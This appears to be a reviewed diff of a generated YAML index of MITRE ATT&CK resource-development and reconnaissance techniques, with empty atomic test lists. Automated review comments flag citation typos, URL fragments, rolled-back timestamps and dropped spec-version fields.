Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54431,22 +55046,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
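Review bot: the FireEyeSupplyChain description still reads `From Quartermaster to SunshopFireEye`, with the publisher run into the title; the removed lines had the same text, so it is not introduced here, but since the generator re-emits every reference this is the place to strip it or report it upstream. The substantive changes in the T1588 rebuild are the Recorded Future Beacon Certificates URL moving to `https://www.recordedfuture.com/research/cobalt-strike-servers` with a September 2024 retrieved date and the spec version bump to 3.2.0; the remainder is the same key and reference reordering noted for T1588.002.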
@@ -54509,37 +55168,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
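Review bot: the T1584.007 description now cites `(Citation: GWS Apps Script Abuse 2021)` and links T1665, and `x_mitre_version` goes 1.0 to 1.1 to match, but the `GWS Apps Script Abuse 2021` reference itself is only defined in the next hunk. If this change is ever split into separate commits, the intermediate state has a dangling citation key; keep the description and its reference in one commit.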
@@ -54563,11 +55223,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
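Review bot: the new URL `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette` carries a `#google_vignette` fragment, which is the marker Google's interstitial ad appends to the address bar, not part of the article location. Strip the fragment before it propagates into the other indexes, or report it upstream if the generator copies references verbatim.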
@@ -54625,17 +55288,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
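Review bot: the added paragraph has `popularity(Citation: Chexmarx-seo)` with no space before the citation, and `deceive users towards [Supply Chain Compromise] lures` reads awkwardly (`lure users towards` or `deceive users into following` would be clearer). Since this is upstream ATT&CK description text, fix it upstream rather than patching the generated index, otherwise the next regeneration reverts it.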
@@ -54643,7 +55307,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54657,7 +55321,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54690,11 +55354,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
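Review bot: the `source_name: Chexmarx-seo` key is misspelled relative to its sibling `Checkmarx-oss-seo`; it does match the `(Citation: Chexmarx-seo)` used in the description, so citations resolve today, but whoever normalizes the spelling must change both the `source_name` and the inline citation in the same commit or the resolver breaks. The two Checkmarx references also point at different hosts (`zero.checkmarx.com` and `checkmarx.com`); worth a quick check that both still resolve before merging.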
@@ -54716,7 +55387,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54734,47 +55405,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
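Review bot: T1588.003 loses `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with no replacement in this hunk, the same silent drop seen for T1585.001, T1587.004 and T1608.003 earlier in the patch, while T1587 directly below is rebuilt with `x_mitre_attack_spec_version: 3.2.0`. A single grep over the regenerated file for technique objects lacking `x_mitre_attack_spec_version` would confirm whether these are generator gaps or intentional before this is merged.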
@@ -54783,21 +55417,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
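Review bot: `spec_version: '2.1'` is removed from T1587 here (the `- spec_version: '2.1'` line just above `- x_mitre_attack_spec_version: 2.1.0`) and nothing re-adds it, while `x_mitre_attack_spec_version` goes 2.1.0 -> 3.2.0; the same removal repeats for every technique object in this diff. STIX 2.0 objects carry no per-object `spec_version`, STIX 2.1 objects require one, so this looks like the generator switched source bundles rather than a field being pruned on purpose. If that is intended, say so in the PR description and check that nothing downstream validates these technique blobs as STIX 2.1. The rest of the hunk (`x_mitre_modified_by_ref`, the five `external_references` entries) is the same content re-emitted in a different key order, not a content change.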
@@ -54837,7 +55507,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
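Review bot: the `modified` timestamp for T1588.005 moves backwards, `2022-04-25T14:00:00.188Z` -> `2021-04-15T03:14:01.255Z`, and the same rollback hits T1596.003, T1597.002, T1590.005, T1596.002, T1596.001, T1591.003 and T1592.001 further down in this file. The old value is identical on all of them, i.e. a bulk re-stamp, so the new values are plausibly the real last-content-change dates, but any consumer that treats `modified` as monotonic (sync-by-newest, change detection) will now see these objects as older than what it already has. One sentence in the commit message naming the new upstream source and stating that the rollback is expected would save the next person a bisect.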
@@ -54856,15 +55526,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
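Review bot: for T1588.005 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and, unlike T1584.001 two hunks below where the field is bumped to 3.2.0, no `x_mitre_attack_spec_version` is re-added anywhere in the object (the hunks either side of it are separated by unchanged context, so there is no hidden insertion). Together with its `modified` going back to 2021 in the previous hunk, this object now looks as if it came from an older bundle than its neighbours; confirm every technique is read from one source before merging. The T1584.001 description change in this hunk (adding a managed DNS service such as AWS Route53 as a registration-hijack path) is a genuine content update and is matched by the 1.3 -> 1.4 version bump in the next hunk.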
@@ -54872,19 +55540,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54918,55 +55586,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
